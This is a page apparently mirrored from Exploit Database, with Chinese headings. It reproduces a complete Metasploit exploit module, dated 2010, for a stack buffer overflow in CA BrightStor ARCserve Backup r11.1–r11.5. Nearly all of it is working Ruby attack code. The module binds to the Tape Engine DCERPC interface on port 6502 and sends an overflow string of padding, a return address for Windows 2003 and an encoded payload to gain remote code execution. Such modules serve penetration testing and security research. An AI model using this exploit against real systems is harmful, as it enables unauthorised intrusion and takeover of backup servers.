CA BrightStor ARCserve Tape Engine – 0x8A Buffer Overflow (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2010-10-05
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16417/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  
  Rank = AverageRanking
  
  include Msf::Exploit::Remote::DCERPC
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
  'Description'=> %q{
  This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
  r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
  the buffer and execute arbitrary code.
  },
  'Author' => [ 'MC' ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  [ 'OSVDB', '68330'],
  [ 'URL', 'http://www.metasploit.com/users/mc' ],
  ],
  'Privileged' => true,
  'DefaultOptions' =>
  {
  'EXITFUNC' => 'thread',
  },
  'Payload'=>
  {
  'Space'=> 500,
  'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
  'StackAdjustment' => -3500,
  },
  'Platform' => 'win',
  'Targets'=>
  [
  [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
  ],
  'DisclosureDate' => 'Oct 4 2010',
  'DefaultTarget'=> 0))
  
  register_options([ Opt::RPORT(6502) ], self.class)
  end
  
  def exploit
  
  connect
  
  handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
  print_status("Binding to #{handle} ...")
  
  dcerpc_bind(handle)
  print_status("Bound to #{handle} ...")
  
  request ="\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
  request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  
  dcerpc.call(0x2B, request)
  
  sploit =NDR.long(4)
  sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
  
  print_status("Trying target #{target.name}...")
  
  begin
  dcerpc_call(0x8A, sploit)
  rescue Rex::Proto::DCERPC::Exceptions::NoResponse
  end
  
  handler
  disconnect
  
  end
  
  end
  =begin
  /* opcode: 0x8A, address: 0x100707D0 */
  
  long sub_100707D0 (
   [in] handle_targ_1,
   [in] longarg_2,
   [in][ref][string] char * arg_3
  );
  =end